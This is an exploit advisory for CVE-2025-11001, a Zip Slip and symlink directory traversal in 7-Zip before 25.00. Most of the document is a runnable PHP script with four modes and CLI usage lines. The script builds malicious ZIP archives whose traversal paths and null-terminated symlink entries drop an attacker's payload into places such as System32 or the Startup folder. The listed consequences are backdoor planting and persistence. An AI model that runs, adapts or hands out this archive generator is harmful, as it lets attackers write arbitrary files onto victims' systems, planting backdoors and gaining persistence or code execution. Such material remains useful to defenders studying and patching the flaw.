=============================================================================================================================================
| # Title     : 7-Zip 25.00 Zip Slip Symlink Directory Traversal Vulnerability                                                              |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |
| # Vendor    : https://www.7-zip.org/                                                                                                      |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/211932/ & CVE-2025-11001 

[+] Summary :

Multiple archive extraction implementations, including 7‑Zip versions prior to 25.00 and several ZIP libraries, improperly sanitize file paths during extraction.
An attacker can craft a malicious ZIP archive containing:

Directory traversal sequences (../../../)

Symlink entries

Manipulated extra fields

Null‑byte terminated link targets

This allows files to be extracted outside the intended extraction folder and written to arbitrary locations on the victim system.

[+] Vulnerability Class :

Directory Traversal

Arbitrary File Write

Symlink Path Injection

Null-byte truncation bug

[+]  Affected Software :

7‑Zip < 25.00 (Administrator-only exploitation on Windows)

Any ZIP extraction tool vulnerable to Zip Slip (Java, PHP, Python, WinRAR variants...)

Applications that use ZipArchive without proper sanitization

[+] Impact

A malicious ZIP archive allows an attacker to place files in arbitrary locations such as

C:\Windows\System32\
C:\ProgramData\Microsoft\Windows\Start Menu\
/etc/
/var/www/html/


[+] Possible consequences:

    Backdoor planting

    Privilege escalation

    Persistence via startup folders

    Overwriting sensitive files

    Gaining remote execution depending on file location created

[+] Technical Details

[+] Core Exploit Mechanism

The attacker inserts filenames such as : ../../../../Windows/System32/evil.exe

or a symlink entry:  evil.lnk  →  ../../../../Users/Public/Documents\0

These paths bypass validators in 7‑Zip and other ZIP extractors when running with elevated privileges.

poc

<?php
/*
===========================================================
   By Indoushka (Nekaa Salah eddine)
===========================================================
*/

/* ===========================================================
   MODE 1 — Basic Zip Slip Exploit
   (Former: build_zip duplicated 4 times)
=========================================================== */
function poc_zip_slip($target_path, $payload_file, $output_zip)
{
    if (!file_exists($payload_file)) { die("[-] Payload not found\n"); }

    $payload_name = basename($payload_file);
    $payload_data = file_get_contents($payload_file);

    $target = trim(str_replace("\\", "/", $target_path), "/") . "/";
    $traversal = "../../../../" . $target;

    $zip = new ZipArchive();
    if ($zip->open($output_zip, ZipArchive::CREATE | ZipArchive::OVERWRITE) !== TRUE) {
        die("[-] Failed to create ZIP\n");
    }

    $zip->addFromString($traversal . $payload_name, $payload_data);
    $zip->close();

    echo "[+] PoC: Zip Slip ZIP created: $output_zip\n";
}


/* ===========================================================
   MODE 2 — Manual Symlink ZIP Creator
=========================================================== */
function poc_symlink_zip($target_path, $output_zip)
{
    $target = trim(str_replace("\\", "/", $target_path), "/") . "/";
    $traversal = "../../../../" . $target;

    $name = "evil.lnk";
    $link = $traversal . "\x00";

    $extra  = pack("v", 0x756e);
    $extra .= pack("v", strlen($link));
    $extra .= $link;

    $local = pack("VvvvvvVVVvv",
        0x04034b50, 20, 0x800, 0x800, 0,0,0,0,0,
        strlen($name), strlen($extra)
    );

    file_put_contents($output_zip, $local . $name . $extra);

    echo "[+] PoC: Symlink ZIP created: $output_zip\n";
}


/* ===========================================================
   MODE 3 — Full Manual ZIP Builder (Symlink + Payload)
=========================================================== */
function poc_manual_zip($target_path, $payload_file, $output_zip)
{
    if (!file_exists($payload_file)) { die("[-] Missing payload\n"); }

    $payload_name  = basename($payload_file);
    $payload_data  = file_get_contents($payload_file);

    $target = trim(str_replace("\\", "/", $target_path), "/") . "/";
    $trav   = "../../../../" . $target;

    $ln_name   = "evil.lnk";
    $ln_target = $trav . "\x00";
    $ln_extra  = pack("v", 0x756e).pack("v",strlen($ln_target)).$ln_target;

    $f = fopen($output_zip, "wb");
    $off = 0;

    // Local: Symlink
    $h1 = pack("VvvvvvVVVvv",
        0x04034b50,20,0x800,0x800,0,0,0,0,0,strlen($ln_name),strlen($ln_extra)
    );
    fwrite($f, $h1.$ln_name.$ln_extra);
    $symlink_offset = $off;
    $off += strlen($h1)+strlen($ln_name)+strlen($ln_extra);

    // Local: Payload
    $h2 = pack("VvvvvvVVVvv",
        0x04034b50,20,0x800,0,0,0,0,strlen($payload_data),strlen($payload_data),
        strlen($payload_name),0
    );
    fwrite($f, $h2.$payload_name.$payload_data);
    $payload_offset = $off;
    $off += strlen($h2)+strlen($payload_name)+strlen($payload_data);

    // Central Directory
    $cd_start = $off;

    // CD: Symlink
    $cd1 = pack("VvvvvvVVVvvvvvVV",
        0x02014b50,0x0317,20,0x800,0,0,0,0,0,0,
        strlen($ln_name),strlen($ln_extra),0,0,0,(0777<<16)|0xA1ED,$symlink_offset
    );
    fwrite($f, $cd1.$ln_name.$ln_extra);

    // CD: Payload
    $cd2 = pack("VvvvvvVVVvvvvvVV",
        0x02014b50,0x0317,20,0x800,0,0,0,0,
        strlen($payload_data),strlen($payload_data),
        strlen($payload_name),0,0,0,0,(0777<<16),$payload_offset
    );
    fwrite($f, $cd2.$payload_name);

    // EOCD
    $eocd = pack("VvvvvVVv",
        0x06054b50,0,0,2,2,$off,$cd_start,0
    );
    fwrite($f, $eocd);
    fclose($f);

    echo "[+] PoC: Manual ZIP generated: $output_zip\n";
}


/* ===========================================================
   MODE 4 — CVE‑2025‑11001 (7-Zip Directory Traversal)
=========================================================== */
function poc_cve_2025_11001($target, $payload, $output)
{
    poc_manual_zip($target, $payload, $output);

    echo "[+] CVE-2025-11001 Archive Ready\n";
}


/* ===========================================================
   CLI Controller
=========================================================== */

if (php_sapi_name() == "cli")
{
    $args = getopt("", [
        "mode:",
        "target:",
        "payload::",
        "output::"
    ]);

    if (!isset($args["mode"])) {
        die("Usage:\n
php exploit.php --mode=zip-slip     --target=DIR --payload=file --output=out.zip
php exploit.php --mode=symlink      --target=DIR --output=out.zip
php exploit.php --mode=manual       --target=DIR --payload=file --output=out.zip
php exploit.php --mode=cve-2025-11001 --target=DIR --payload=file --output=exp.zip
");
    }

    $mode   = $args["mode"];
    $target = $args["target"] ?? null;
    $payload= $args["payload"] ?? null;
    $output = $args["output"] ?? "exploit.zip";

    switch ($mode) {
        case "zip-slip":
            poc_zip_slip($target, $payload, $output);
            break;

        case "symlink":
            poc_symlink_zip($target, $output);
            break;

        case "manual":
            poc_manual_zip($target, $payload, $output);
            break;

        case "cve-2025-11001":
            poc_cve_2025_11001($target, $payload, $output);
            break;

        default:
            echo "Unknown mode.\n";
    }
}
?>


Save as : poc.php

run : php poc.php


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================